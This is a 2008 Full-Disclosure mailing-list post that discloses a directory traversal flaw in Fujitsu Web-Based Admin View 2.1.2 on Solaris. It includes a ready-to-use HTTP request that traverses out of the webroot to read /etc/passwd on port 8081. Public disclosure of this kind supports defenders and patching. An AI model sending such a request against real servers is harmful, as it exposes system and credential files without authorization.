[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Fujitsu Web-Based Admin View Directory Traversal Vulnerability

To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Fujitsu Web-Based Admin View Directory Traversal Vulnerability
From: "Deniz Cevik" <Deniz.Cevik@xxxxxxxxxxxxxxxx>
Date: Thu, 21 Aug 2008 16:34:00 +0300

Fujitsu Web-Based Admin View Directory Traversal Vulnerability

 

Version: 2.1.2 on Solaris, Other versions may vulnerable

 

Vulnerability: Directory Traversal

 

Risk: Critical

 

Description:  Due to insufficient control of user inputs, Fujitsu
Web-based admin view reveals content of files residing in folders other
than webroot. This will allow an attacker to view arbitrary local files
within the context of the web server. 

 

Sample Request:

 

GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0

Host: target:8081

 

Deniz CEVIK

www.intellectpro.com.tr

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Hacking OSPF with MD5 authentication enabled
Next by Date: [Full-disclosure] UPDATE: [ GLSA 200804-22 ] PowerDNS Recursor: DNS Cache Poisoning
Previous by thread: [Full-disclosure] Version-independent IOS shellcode
Next by thread: [Full-disclosure] UPDATE: [ GLSA 200804-22 ] PowerDNS Recursor: DNS Cache Poisoning
Index(es):
- Date
- Thread